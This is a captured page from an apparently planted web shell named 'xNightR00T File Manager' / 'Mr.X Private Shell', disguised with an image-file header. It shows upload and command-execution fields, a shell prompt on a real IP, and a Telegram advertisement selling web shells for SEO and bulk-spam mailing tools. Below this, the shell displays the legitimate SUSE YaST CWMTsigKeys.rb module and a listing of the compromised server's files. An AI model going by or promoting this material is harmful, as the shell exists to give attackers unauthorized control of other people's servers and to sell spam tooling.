xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ***************************************************************************
#
# Copyright (c) 2002 - 2012 Novell, Inc.
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail,
# you may find current contact information at www.novell.com
#
# ***************************************************************************
# File:	modules/CWMTsigKeys.ycp
# Package:	Common widget manipulation, TSIG keys management widget
# Summary:	Routines for management of TSIG keys
# Authors:	Jiri Srain <jsrain@suse.cz>
#
# $Id$
#
require "yast"

module Yast
  class CWMTsigKeysClass < Module
    def main
      Yast.import "UI"
      textdomain "base"

      Yast.import "CWM"
      Yast.import "Label"
      Yast.import "Report"
      Yast.import "Popup"
      Yast.import "String"

      # private variables

      # Currently configured TSIG keys
      # Each entry is a map with keys "filename" and "key"
      @tsig_keys = []

      # Filenames of the files that contained deleted TSIG keys
      @deleted_tsig_keys = []

      # Filenames of the new added TSIG keys
      @new_tsig_keys = []
    end

    # private functions

    # Redraw the table of DDNS keys
    def DdnsKeysWidgetRedraw
      items = Builtins.maplist(@tsig_keys) do |k|
        Item(
          Id(Ops.get(k, "key", "")),
          Ops.get(k, "key", ""),
          Ops.get(k, "filename", "")
        )
      end
      UI.ChangeWidget(
        Id("_cwm_delete_key"),
        :Enabled,
        Ops.greater_than(Builtins.size(items), 0)
      )
      UI.ChangeWidget(Id("_cwm_key_listing_table"), :Items, items)
      UI.SetFocus(Id("_cwm_key_listing_table"))

      nil
    end

    # Get the file that contains the specified key
    # @param [String] key string key ID
    # @return [String] file containing the key
    def Key2File(key)
      filename = ""
      Builtins.find(@tsig_keys) do |k|
        if Ops.get(k, "key") == key
          filename = Ops.get(k, "filename", "")
          next true
        end
        false
      end
      Builtins.y2milestone("Key: %1, File: %2", key, filename)
      filename
    end

    # Remove file with all TSIG keys it contains
    # @param [String] filename string filename of the file with the TSIG keys
    def RemoveTSIGKeyFile(filename)
      @new_tsig_keys = Builtins.filter(@new_tsig_keys) { |f| f != filename }
      @deleted_tsig_keys = Builtins.add(@deleted_tsig_keys, filename)
      @tsig_keys = Builtins.filter(@tsig_keys) do |k|
        Ops.get(k, "filename", "") != filename
      end

      nil
    end

    # Remove file containing specified TSIG key
    # @param [String] key string key ID
    def RemoveTSIGKey(key)
      filename = Key2File(key)
      RemoveTSIGKeyFile(filename)

      nil
    end

    # Add new file with TSIG key
    # @param [String] filename string filename of the file with the TSIG key
    def AddTSIGKeyFile(filename)
      @deleted_tsig_keys = Builtins.filter(@deleted_tsig_keys) do |f|
        f != filename
      end
      @new_tsig_keys = Builtins.add(@new_tsig_keys, filename)
      keys = AnalyzeTSIGKeyFile(filename)
      Builtins.foreach(keys) do |k|
        @tsig_keys = Builtins.add(
          @tsig_keys,
          "key" => k, "filename" => filename
        )
      end

      nil
    end

    # public routines related to TSIG keys management

    # Remove leading and trailibg blanks and quotes from file name
    # @param [String] filename string file name
    # @return file name without leading/trailing quotes and blanks
    def NormalizeFilename(filename)
      while filename != "" &&
          (Builtins.substring(filename, 0, 1) == " " ||
            Builtins.substring(filename, 0, 1) == "\"")
        filename = Builtins.substring(filename, 1)
      end
      while filename != "" &&
          (Builtins.substring(
            filename,
            Ops.subtract(Builtins.size(filename), 1),
            1
          ) == " " ||
            Builtins.substring(
              filename,
              Ops.subtract(Builtins.size(filename), 1),
              1
            ) == "\"")
        filename = Builtins.substring(
          filename,
          0,
          Ops.subtract(Builtins.size(filename), 1)
        )
      end
      filename
    end

    # Analyze file that may contain TSIG keys
    # @param [String] filename string filename of the file that may contain TSIG keys
    # @return a list of all TSIG key IDs in the file
    def AnalyzeTSIGKeyFile(filename)
      filename = NormalizeFilename(filename)
      contents = Convert.to_string(SCR.Read(path(".target.string"), filename))
      if contents.nil?
        Builtins.y2warning("Unable to read file with TSIG keys: %1", filename)
        return []
      end
      ret = []
      parts = Builtins.splitstring(contents, "{}")
      Builtins.foreach(parts) do |p|
        if Builtins.regexpmatch(p, ".*key[[:space:]]+[^[:space:]}{;]+\\.* $")
          ret = Builtins.add(
            ret,
            Builtins.regexpsub(
              p,
              ".*key[[:space:]]+([^[:space:]}{;]+)\\.* $",
              "\\1"
            )
          )
        end
      end
      Builtins.y2milestone("File: %1, Keys: %2", filename, ret)
      deep_copy(ret)
    end

    # Remove all 3 files holding the TSIG key data
    # @param [String] main string filename of the main file
    def DeleteTSIGKeyFromDisk(main)
      keys = AnalyzeTSIGKeyFile(main)
      Builtins.y2milestone("Removing file %1, found keys: %2", main, keys)
      Builtins.foreach(keys) do |k|
        SCR.Execute(
          path(".target.bash"),
          Builtins.sformat("rm -rf /etc/named.d/K%1\\.* ", Builtins.tolower(k))
        )
      end
      SCR.Execute(path(".target.remove"), main)

      nil
    end

    # Transformate the list of files to the list of TSIG key description maps
    # @param [Array<String>] filenames a list of file names of the TSIG keys
    # @return a list of TSIG key describing maps
    def Files2KeyMaps(filenames)
      filenames = deep_copy(filenames)
      tmpret = Builtins.maplist(filenames) do |f|
        keys = AnalyzeTSIGKeyFile(f)
        Builtins.maplist(keys) { |k| { "filename" => f, "key" => k } }
      end
      ret = Builtins.flatten(tmpret)
      Builtins.y2milestone("Files: %1, Keys: %2", filenames, ret)
      deep_copy(ret)
    end

    # Get all TSIG keys that present in the files
    # @param filename a list of file names
    # @return a list of all TSIG key IDs
    def Files2Keys(filenames)
      filenames = deep_copy(filenames)
      keys = Files2KeyMaps(filenames)
      ret = Builtins.maplist(keys) { |k| Ops.get(k, "key", "") }
      Builtins.y2milestone("Files: %1, Keys: %2", filenames, ret)
      deep_copy(ret)
    end

    # widget related functions

    # Init function of the widget
    # @param [Hash{String => Object}] widget a widget description map
    # @param [String] key strnig the widget key
    def Init(widget, _key)
      widget = deep_copy(widget)
      get_keys_info = Convert.convert(
        Ops.get(widget, "get_keys_info"),
        from: "any",
        to:   "map <string, any> ()"
      )
      info = get_keys_info.call
      @tsig_keys = Ops.get_list(info, "tsig_keys", [])
      @deleted_tsig_keys = Ops.get_list(info, "removed_files", [])
      @new_tsig_keys = Ops.get_list(info, "new_files", [])
      if !Builtins.haskey(info, "tsig_keys")
        files = Ops.get_list(info, "key_files", [])
        @tsig_keys = Files2KeyMaps(files)
      end
      initial_path = "/etc/named.d/"
      UI.ChangeWidget(Id("_cwm_existing_key_file"), :Value, initial_path)
      UI.ChangeWidget(Id("_cwm_new_key_file"), :Value, initial_path)
      UI.ChangeWidget(
        Id("_cwm_new_key_id"),
        :ValidChars,
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
      )
      DdnsKeysWidgetRedraw()

      nil
    end

    # Handle function of the widget
    # @param [Hash{String => Object}] widget a widget description map
    # @param [String] key strnig the widget key
    # @param [Hash] event map event to be handled
    # @return [Symbol] for wizard sequencer or nil
    def Handle(widget, _key, event)
      widget = deep_copy(widget)
      event = deep_copy(event)
      ret = Ops.get(event, "ID")
      existing_filename = Convert.to_string(
        UI.QueryWidget(Id("_cwm_existing_key_file"), :Value)
      )
      new_filename = Convert.to_string(
        UI.QueryWidget(Id("_cwm_new_key_file"), :Value)
      )
      if ret == "_cwm_delete_key"
        key2 = Convert.to_string(
          UI.QueryWidget(Id("_cwm_key_listing_table"), :CurrentItem)
        )
        delete_filename = Key2File(key2)
        if Ops.get(widget, "list_used_keys") &&
            Ops.is(Ops.get(widget, "list_used_keys"), "list <string> ()")
          lister = Convert.convert(
            Ops.get(widget, "list_used_keys"),
            from: "any",
            to:   "list <string> ()"
          )
          used_keys = lister.call
          keys_to_delete = AnalyzeTSIGKeyFile(delete_filename)
          keys_to_delete = Builtins.filter(keys_to_delete) do |k|
            Builtins.contains(used_keys, k)
          end
          if Ops.greater_than(Builtins.size(keys_to_delete), 0)
            # popup message
            message = _(
              "The selected TSIG key cannot be deleted,\n" \
                "because it is in use.\n" \
                "Stop using it in the configuration first."
            )
            # popup title
            Popup.AnyMessage(_("Cannot delete TSIG key."), message)
            return nil
          end
        end
        RemoveTSIGKeyFile(delete_filename)
      elsif ret == "_cwm_browse_existing_key_file"
        existing_filename = UI.AskForExistingFile(
          existing_filename,
          "",
          # popup headline
          _("Select File with the Authentication Key")
        )
        if !existing_filename.nil?
          UI.ChangeWidget(
            Id("_cwm_existing_key_file"),
            :Value,
            existing_filename
          )
        end
        return nil
      elsif ret == "_cwm_browse_new_key_file"
        new_filename = UI.AskForSaveFileName(
          new_filename,
          "",
          # popup headline
          _("Select File for the Authentication Key")
        )
        if !new_filename.nil?
          UI.ChangeWidget(Id("_cwm_new_key_file"), :Value, new_filename)
        end
        return nil
      elsif ret == "_cwm_generate_key"
        if !UI.WidgetExists(Id("_cwm_new_key_file"))
          Builtins.y2error("No such UI widget: %1", "_cwm_new_key_file")
          return nil
        end

        key2 = Convert.to_string(UI.QueryWidget(Id("_cwm_new_key_id"), :Value))
        stat = Convert.to_map(SCR.Read(path(".target.stat"), new_filename))

        if Builtins.size(stat) != 0
          if Ops.get_boolean(stat, "isdir", false)
            UI.SetFocus(Id("_cwm_new_key_file"))
            Report.Error(
              # error report
              _("Specified filename is an existing directory.")
            )
            return nil
          end
          # yes-no popup
          return nil unless Popup.YesNo(_("Specified file exists. Rewrite it?"))

          DeleteTSIGKeyFromDisk(new_filename)
          RemoveTSIGKeyFile(new_filename)
        end
        if key2.nil? || key2 == ""
          UI.SetFocus(Id("_cwm_new_key_id"))
          # error report
          Popup.Error(_("The TSIG key ID was not specified."))
          return nil
        end
        # specified key exists
        if Key2File(key2) != ""
          # yes-no popup
          if !Popup.YesNo(
            _("The key with the specified ID exists and is used.\nRemove it?")
          )
            return nil
          else
            remove_file = Key2File(key2)
            DeleteTSIGKeyFromDisk(remove_file)
            RemoveTSIGKeyFile(remove_file)
          end
        end
        # specified key is present on the disk, but not used
        if 0 ==
            SCR.Execute(
              path(".target.bash"),
              Builtins.sformat(
                "ls /etc/named.d/K%1\\.*",
                Builtins.tolower(key2)
              )
            )
          # yes-no popup
          if Popup.YesNo(
            _(
              "A key with the specified ID was found\non your disk. Remove it?"
            )
          )
            SCR.Execute(
              path(".target.bash"),
              Builtins.sformat(
                "rm -rf `ls /etc/named.d/K%1\\.*`",
                Builtins.tolower(key2)
              )
            )
            files = Convert.convert(
              SCR.Read(path(".target.dir"), "/etc/named.d"),
              from: "any",
              to:   "list <string>"
            )
            Builtins.foreach(files) do |f|
              if Builtins.contains(AnalyzeTSIGKeyFile(f), key2)
                DeleteTSIGKeyFromDisk(f)
              end
            end
          end
        end

        # yes-no popup
        return nil if !Popup.YesNo(_("The key will be created now. Continue?"))
        SCR.Execute(
          path(".target.bash"),
          "test -d /etc/named.d || mkdir /etc/named.d"
        )
        gen_command = Builtins.sformat(
          "/usr/bin/genDDNSkey --force  -f '%1' -n '%2' -d /etc/named.d",
          String.Quote(new_filename),
          String.Quote(key2)
        )
        Builtins.y2milestone("Running %1", gen_command)
        gen_ret = Convert.to_integer(
          SCR.Execute(path(".target.bash"), gen_command)
        )
        if gen_ret != 0
          # error report
          Report.Error(_("Creating the TSIG key failed."))
          return nil
        end
        ret = "_cwm_add_key"
        existing_filename = new_filename
      end
      if ret == "_cwm_add_key"
        stat = Convert.to_map(SCR.Read(path(".target.stat"), new_filename))
        if Builtins.size(stat) == 0
          # message popup
          Popup.Message(_("The specified file does not exist."))
          return nil
        end
        keys = AnalyzeTSIGKeyFile(existing_filename)
        if Builtins.size(keys) == 0
          # message popup
          Popup.Message(_("The specified file does not contain any TSIG key."))
          return nil
        end
        coliding_files = Builtins.maplist(keys) { |k| Key2File(k) }
        coliding_files = Builtins.filter(Builtins.toset(coliding_files)) do |f|
          f != ""
        end
        if Ops.greater_than(Builtins.size(coliding_files), 0)
          # yes-no popup
          if !Popup.YesNo(
            _(
              "The specified file contains a TSIG key with the same\n" \
                "identifier as some of already present keys.\n" \
                "Old keys will be removed. Continue?"
            )
          )
            return nil
          else
            Builtins.foreach(coliding_files) { |f| RemoveTSIGKeyFile(f) }
          end
        end
        AddTSIGKeyFile(existing_filename)
      end
      DdnsKeysWidgetRedraw()
      nil
    end

    # Store function of the widget
    # @param [Hash{String => Object}] widget a widget description map
    # @param [String] key strnig the widget key
    # @param [Hash] event map that caused widget data storing
    def Store(widget, _key, _event)
      widget = deep_copy(widget)
      set_info = Convert.convert(
        Ops.get(widget, "set_keys_info"),
        from: "any",
        to:   "void (map <string, any>)"
      )
      info = {
        "removed_files" => @deleted_tsig_keys,
        "new_files"     => @new_tsig_keys,
        "tsig_keys"     => @tsig_keys,
        "key_files"     => Builtins.toset(Builtins.maplist(@tsig_keys) do |k|
          Ops.get(k, "filename", "")
        end)
      }
      set_info.call(info)

      nil
    end

    # Store function of the widget
    # @param map widget a widget description map
    # @param [String] key strnig the widget key
    # @param event map that caused widget data storing/**
    # Init function of the widget
    # @param [String] key strnig the widget key
    def InitWrapper(key)
      Init(CWM.GetProcessedWidget, key)

      nil
    end

    # Handle function of the widget
    # @param map widget a widget description map
    # @param [String] key strnig the widget key
    # @param [Hash] event map event to be handled
    # @return [Symbol] for wizard sequencer or nil
    def HandleWrapper(key, event)
      event = deep_copy(event)
      Handle(CWM.GetProcessedWidget, key, event)
    end

    # Store function of the widget
    # @param [String] key strnig the widget key
    # @param [Hash] event map that caused widget data storing
    def StoreWrapper(key, event)
      event = deep_copy(event)
      Store(CWM.GetProcessedWidget, key, event)

      nil
    end

    # Get the widget description map
    # @param [Hash{String => Object}] settings a map of all parameters needed to create the widget properly
    # <pre>
    # "get_keys_info" : map<string,any>() -- function for getting information
    #          about TSIG keys. Return map should contain:
    #           - "removed_files" : list<string> -- files that have been removed
    #           - "new_files" : list<string> -- files that have been added
    #           - "tsig_keys" : list<map<string,string>> -- list of all TSIG keys
    #           - "key_files" : list<string> -- list of all files that may contain
    #                       TSIG keys
    #           Either "tsig_keys" or "key_files" are mandatory
    # "set_keys_info" : void (map<string,any>) -- function for storing information
    #          about keys. Map has keys:
    #           - "removed_files" : list<string> -- files that have been removed
    #           - "new_files" : list<string> -- files that have been added
    #           - "tsig_keys" : list<map<string,string>> -- list of all TSIG keys
    #           - "key_files" : list<string> -- list of all files that contain
    #                       TSIG keys
    #
    # Additional settings:
    # - "list_used_keys" : list<string>() -- function for getting the list of
    #          used TSIG keys. The list is used to prevent used TSIG keys from
    #          being deleted. If not present, all keys may get deleted.
    # - "help" : string -- help to the whole widget. If not specified, generic help
    #          is used (button labels are patched correctly)
    # </pre>
    # @return a map the widget description map
    def CreateWidget(settings)
      settings = deep_copy(settings)
      # tsig keys management dialog help 1/4
      help = _(
        "<p><big><b>TSIG Key Management</b></big><br>\nUse this dialog to manage the TSIG keys.</p>\n"
      ) +
        # tsig keys management dialog help 2/4
        _(
          "<p><big><b>Adding an Existing TSIG Key</b></big><br>\n" \
            "To add an already created TSIG key, select a <b>Filename</b> of the file\n" \
            "containing the key and click <b>Add</b>.</p>\n"
        ) +
        # tsig keys management dialog help 3/4
        _(
          "<p><big><b>Creating a New TSIG Key</b></big><br>\n" \
            "To create a new TSIG key, set the <b>Filename</b> of the file in which to\n" \
            "create the key and the <b>Key ID</b> to identify the key then click\n" \
            "<b>Generate</b>.</p>\n"
        ) +
        # tsig keys management dialog help 4/4
        _(
          "<p><big><b>Removing a TSIG Key</b></big><br>\n" \
            "To remove a configured TSIG key, select it and click <b>Delete</b>.\n" \
            "All keys in the same file are deleted.\n" \
            "If a TSIG key is in use in the configuration\n" \
            "of the server, it cannot be deleted. The server must stop using it\n" \
            "in the configuration first.</p>\n"
        )

      add_existing = VSquash(
        # Frame label - adding a created server key
        Frame(
          _("Add an Existing TSIG Key"),
          HBox(
            HWeight(
              9,
              HBox(
                HWeight(
                  7,
                  HBox(
                    InputField(
                      Id("_cwm_existing_key_file"),
                      Opt(:hstretch),
                      # text entry
                      Label.FileName
                    )
                  )
                ),
                HWeight(
                  2,
                  HBox(
                    VBox(
                      Label(" "),
                      PushButton(
                        Id("_cwm_browse_existing_key_file"),
                        Label.BrowseButton
                      )
                    )
                  )
                )
              )
            ),
            HWeight(
              2,
              Bottom(
                VSquash(
                  PushButton(
                    Id("_cwm_add_key"),
                    Opt(:hstretch),
                    Label.AddButton
                  )
                )
              )
            )
          )
        )
      )

      create_new = VSquash(
        # Frame label - creating a new server key
        Frame(
          _("Create a New TSIG Key"),
          HBox(
            HWeight(
              9,
              HBox(
                HWeight(
                  7,
                  HBox(
                    # text entry
                    InputField(
                      Id("_cwm_new_key_id"),
                      Opt(:hstretch),
                      _("&Key ID")
                    ),
                    # text entry
                    InputField(
                      Id("_cwm_new_key_file"),
                      Opt(:hstretch),
                      Label.FileName
                    )
                  )
                ),
                HWeight(
                  2,
                  HBox(
                    VBox(
                      Label(" "),
                      PushButton(
                        Id("_cwm_browse_new_key_file"),
                        Label.BrowseButton
                      )
                    )
                  )
                )
              )
            ),
            HWeight(
              2,
              Bottom(
                # push button
                VSquash(
                  PushButton(
                    Id("_cwm_generate_key"),
                    Opt(:hstretch),
                    _("&Generate")
                  )
                )
              )
            )
          )
        )
      )

      current_keys = VBox(
        VSpacing(0.5),
        # Table header - in fact label
        Left(Label(_("Current TSIG Keys"))),
        HBox(
          HWeight(
            9,
            Table(
              Id("_cwm_key_listing_table"),
              Header(
                # Table header item - DNS key listing
                _("Key ID"),
                # Table header item - DNS key listing
                _("Filename")
              ),
              []
            )
          ),
          HWeight(
            2,
            VBox(
              VSquash(
                PushButton(
                  Id("_cwm_delete_key"),
                  Opt(:hstretch),
                  Label.DeleteButton
                )
              ),
              VStretch()
            )
          )
        )
      )

      contents = VBox(add_existing, create_new, current_keys)

      ret = Convert.convert(
        Builtins.union(
          {
            "widget"        => :custom,
            "custom_widget" => contents,
            "help"          => help,
            "init"          => fun_ref(method(:InitWrapper), "void (string)"),
            "store"         => fun_ref(
              method(:StoreWrapper),
              "void (string, map)"
            ),
            "handle"        => fun_ref(
              method(:HandleWrapper),
              "symbol (string, map)"
            )
          },
          settings
        ),
        from: "map",
        to:   "map <string, any>"
      )

      deep_copy(ret)
    end

    publish function: :AnalyzeTSIGKeyFile, type: "list <string> (string)"
    publish function: :NormalizeFilename, type: "string (string)"
    publish function: :DeleteTSIGKeyFromDisk, type: "void (string)"
    publish function: :Files2KeyMaps, type: "list <map <string, string>> (list <string>)"
    publish function: :Files2Keys, type: "list <string> (list <string>)"
    publish function: :Init, type: "void (map <string, any>, string)"
    publish function: :Handle, type: "symbol (map <string, any>, string, map)"
    publish function: :Store, type: "void (map <string, any>, string, map)"
    publish function: :InitWrapper, type: "void (string)"
    publish function: :HandleWrapper, type: "symbol (string, map)"
    publish function: :StoreWrapper, type: "void (string, map)"
    publish function: :CreateWidget, type: "map <string, any> (map <string, any>)"
  end

  CWMTsigKeys = CWMTsigKeysClass.new
  CWMTsigKeys.main
end

Filemanager

Name Type Size Permission Actions
YaPI Folder 0755
YaST Folder 0755
ALog.rb File 3.26 KB 0644
AddOnProduct.rb File 78.59 KB 0644
Address.rb File 3.45 KB 0644
Arch.rb File 15.59 KB 0644
AsciiFile.rb File 12.59 KB 0644
Assert.rb File 2.06 KB 0644
AuditLaf.rb File 21.16 KB 0644
AuthServer.pm File 172.86 KB 0644
AutoInstall.rb File 11.34 KB 0644
AutoInstallRules.rb File 36.37 KB 0644
AutoinstClass.rb File 7.62 KB 0644
AutoinstClone.rb File 6.82 KB 0644
AutoinstCommon.rb File 3.18 KB 0644
AutoinstConfig.rb File 17.86 KB 0644
AutoinstData.rb File 2.37 KB 0644
AutoinstDrive.rb File 14.28 KB 0644
AutoinstFile.rb File 9.3 KB 0644
AutoinstFunctions.rb File 1.1 KB 0644
AutoinstGeneral.rb File 17.48 KB 0644
AutoinstImage.rb File 1.75 KB 0644
AutoinstLVM.rb File 21.58 KB 0644
AutoinstPartPlan.rb File 36.37 KB 0644
AutoinstPartition.rb File 14.53 KB 0644
AutoinstRAID.rb File 7.73 KB 0644
AutoinstScripts.rb File 36.75 KB 0644
AutoinstSoftware.rb File 38.57 KB 0644
AutoinstStorage.rb File 48.62 KB 0644
Autologin.rb File 4.82 KB 0644
BootArch.rb File 3.37 KB 0644
BootStorage.rb File 10.15 KB 0644
BootSupportCheck.rb File 7.36 KB 0644
Bootloader.rb File 15.87 KB 0644
CWM.rb File 39.16 KB 0644
CWMFirewallInterfaces.rb File 38.92 KB 0644
CWMServiceStart.rb File 27.49 KB 0644
CWMTab.rb File 13.2 KB 0644
CWMTable.rb File 14.57 KB 0644
CWMTsigKeys.rb File 24.93 KB 0644
CaMgm.rb File 12.9 KB 0644
Call.rb File 1.53 KB 0644
CheckMedia.rb File 6.1 KB 0644
CommandLine.rb File 52.89 KB 0644
Confirm.rb File 6.95 KB 0644
Console.rb File 8.63 KB 0644
ContextMenu.rb File 1.4 KB 0644
Crash.rb File 5.26 KB 0644
Cron.rb File 2.85 KB 0644
CustomDialogs.rb File 2.52 KB 0644
DNS.rb File 23.77 KB 0644
DebugHooks.rb File 4.89 KB 0644
DefaultDesktop.rb File 13.29 KB 0644
Desktop.rb File 12.5 KB 0644
DevicesSelectionBox.rb File 5.67 KB 0644
DhcpServer.pm File 70.43 KB 0644
DhcpServerUI.rb File 10.43 KB 0644
DialogTree.rb File 11.76 KB 0644
Directory.rb File 4.99 KB 0644
Distro.rb File 2.29 KB 0644
DnsData.pm File 1.65 KB 0644
DnsFakeTabs.rb File 751 B 0644
DnsRoutines.pm File 2.81 KB 0644
DnsServer.pm File 57.26 KB 0644
DnsServerAPI.pm File 68.81 KB 0644
DnsServerHelperFunctions.rb File 11.83 KB 0644
DnsServerUI.rb File 3.78 KB 0644
DnsTsigKeys.pm File 2.53 KB 0644
DnsZones.pm File 22.9 KB 0644
DontShowAgain.rb File 13.03 KB 0644
DualMultiSelectionBox.rb File 24.91 KB 0644
Encoding.rb File 4.54 KB 0644
Event.rb File 4.89 KB 0644
FTP.rb File 2.32 KB 0644
FileChanges.rb File 9.39 KB 0644
FileSystems.rb File 69.86 KB 0644
FileUtils.rb File 17.64 KB 0644
FtpServer.rb File 36.4 KB 0644
GPG.rb File 13.58 KB 0644
GPGWidgets.rb File 12.34 KB 0644
GetInstArgs.rb File 4.04 KB 0644
Greasemonkey.rb File 6.86 KB 0644
HTML.rb File 6.11 KB 0644
HTTP.rb File 3.37 KB 0644
HWConfig.rb File 5.1 KB 0644
Hooks.rb File 5.76 KB 0644
Host.rb File 10.78 KB 0644
Hostname.rb File 7.35 KB 0644
Hotplug.rb File 5.64 KB 0644
HttpServer.rb File 26.81 KB 0644
HttpServerWidgets.rb File 120.87 KB 0644
HwStatus.rb File 3.08 KB 0644
IP.rb File 12.65 KB 0644
IPSecConf.rb File 22.58 KB 0644
Icon.rb File 5.43 KB 0644
ImageInstallation.rb File 49.56 KB 0644
Inetd.rb File 28.29 KB 0644
Initrd.rb File 16.41 KB 0644
InstData.rb File 4.13 KB 0644
InstError.rb File 6.95 KB 0644
InstExtensionImage.rb File 15.48 KB 0644
InstFunctions.rb File 5.12 KB 0644
InstShowInfo.rb File 2.81 KB 0644
InstURL.rb File 6.06 KB 0644
Installation.rb File 10.29 KB 0644
Instserver.rb File 43.86 KB 0644
Integer.rb File 2.99 KB 0644
Internet.rb File 9.29 KB 0644
IscsiClient.rb File 9.74 KB 0644
IscsiClientLib.rb File 55.9 KB 0644
IsnsServer.rb File 11.07 KB 0644
Kdump.rb File 38.8 KB 0644
Kerberos.rb File 37.03 KB 0644
Kernel.rb File 22.96 KB 0644
KeyManager.rb File 8.47 KB 0644
Keyboard.rb File 50.48 KB 0644
Kickstart.rb File 23.84 KB 0644
Label.rb File 9.11 KB 0644
Lan.rb File 32.38 KB 0644
LanItems.rb File 94.36 KB 0644
Language.rb File 45.33 KB 0644
Ldap.rb File 63.96 KB 0644
LdapDatabase.rb File 77.2 KB 0644
LdapPopup.rb File 21.03 KB 0644
LdapServerAccess.pm File 8.73 KB 0644
Linuxrc.rb File 7.53 KB 0644
LogView.rb File 21.39 KB 0644
LogViewCore.rb File 6.32 KB 0644
Mail.rb File 43.92 KB 0644
MailAliases.rb File 6.88 KB 0644
MailTable.pm File 3.25 KB 0644
MailTableInclude.pm File 4.79 KB 0644
Map.rb File 4.27 KB 0644
Message.rb File 11.39 KB 0644
MiniWorkflow.rb File 2.88 KB 0644
Misc.rb File 11.8 KB 0644
Mode.rb File 10.76 KB 0644
ModuleLoading.rb File 9.26 KB 0644
ModulesConf.rb File 4.24 KB 0644
Mtab.rb File 1.24 KB 0644
NetHwDetection.rb File 8.46 KB 0644
Netmask.rb File 5.08 KB 0644
Network.rb File 1.3 KB 0644
NetworkConfig.rb File 5.9 KB 0644
NetworkInterfaces.rb File 56.49 KB 0644
NetworkPopup.rb File 7.86 KB 0644
NetworkService.rb File 12.71 KB 0644
NetworkStorage.rb File 1.91 KB 0644
Nfs.rb File 22.35 KB 0644
NfsOptions.rb File 5.63 KB 0644
NfsServer.rb File 10.64 KB 0644
Nis.rb File 42.75 KB 0644
NisServer.rb File 39.93 KB 0644
Nsswitch.rb File 3.6 KB 0644
NtpClient.rb File 46.6 KB 0644
OSRelease.rb File 3.68 KB 0644
OneClickInstall.rb File 28.86 KB 0644
OneClickInstallStandard.rb File 4.35 KB 0644
OneClickInstallWidgets.rb File 16.54 KB 0644
OneClickInstallWorkerFunctions.rb File 10.6 KB 0644
OneClickInstallWorkerResponse.rb File 5.63 KB 0644
OnlineUpdate.rb File 4.04 KB 0644
OnlineUpdateCallbacks.rb File 19.62 KB 0644
OnlineUpdateDialogs.rb File 16.85 KB 0644
Package.rb File 7.78 KB 0644
PackageAI.rb File 5.03 KB 0644
PackageCallbacks.rb File 87.95 KB 0644
PackageCallbacksInit.rb File 2.12 KB 0644
PackageInstallation.rb File 8.49 KB 0644
PackageKit.rb File 2.67 KB 0644
PackageLock.rb File 6.77 KB 0644
PackageSlideShow.rb File 42.52 KB 0644
PackageSystem.rb File 16.87 KB 0644
Packages.rb File 94.3 KB 0644
PackagesProposal.rb File 11.79 KB 0644
PackagesUI.rb File 24.29 KB 0644
Pam.rb File 3.73 KB 0644
Partitions.rb File 33.23 KB 0644
Popup.rb File 57.78 KB 0644
PortAliases.rb File 10.47 KB 0644
PortRanges.rb File 22.92 KB 0644
Printer.rb File 112.82 KB 0644
Printerlib.rb File 31.82 KB 0644
Product.rb File 8.9 KB 0644
ProductControl.rb File 52.95 KB 0644
ProductFeatures.rb File 12.23 KB 0644
ProductLicense.rb File 50.23 KB 0644
ProductProfile.rb File 8.01 KB 0644
Profile.rb File 29.95 KB 0644
ProfileLocation.rb File 9.45 KB 0644
Progress.rb File 28.17 KB 0644
Proxy.rb File 15.65 KB 0644
Punycode.rb File 11.81 KB 0644
Region.rb File 1.82 KB 0644
RelocationServer.rb File 14.65 KB 0644
Remote.rb File 10.42 KB 0644
Report.rb File 25.13 KB 0644
RichText.rb File 4.01 KB 0644
RootPart.rb File 71.9 KB 0644
Routing.rb File 17.25 KB 0644
SLP.rb File 7.06 KB 0644
SLPAPI.pm File 879 B 0644
SSHAuthorizedKeys.rb File 3.74 KB 0644
SUSERelease.rb File 2.82 KB 0644
Samba.rb File 38.14 KB 0644
SambaAD.pm File 12.46 KB 0644
SambaConfig.pm File 37.4 KB 0644
SambaNetJoin.pm File 13.14 KB 0644
SambaNmbLookup.pm File 6.58 KB 0644
SambaWinbind.pm File 5.33 KB 0644
Security.rb File 27.79 KB 0644
Sequencer.rb File 12.6 KB 0644
Service.rb File 15.66 KB 0644
ServicesProposal.rb File 2.37 KB 0644
SignatureCheckCallbacks.rb File 11.1 KB 0644
SignatureCheckDialogs.rb File 36.74 KB 0644
SlideShow.rb File 33.27 KB 0644
SlideShowCallbacks.rb File 21.04 KB 0644
Slides.rb File 7.56 KB 0644
SlpService.rb File 5.37 KB 0644
Snapper.rb File 16.93 KB 0644
SnapperDbus.rb File 6.73 KB 0644
SourceDialogs.rb File 83.88 KB 0644
SourceManager.rb File 25.54 KB 0644
SourceManagerSLP.rb File 18.66 KB 0644
SpaceCalculation.rb File 35.03 KB 0644
Squid.rb File 51.25 KB 0644
SquidACL.rb File 16.84 KB 0644
SquidErrorMessages.rb File 5.59 KB 0644
Stage.rb File 3.6 KB 0644
Storage.rb File 234.29 KB 0644
StorageClients.rb File 6.68 KB 0644
StorageControllers.rb File 13.47 KB 0644
StorageDevices.rb File 19.86 KB 0644
StorageFields.rb File 45.67 KB 0644
StorageIcons.rb File 3.18 KB 0644
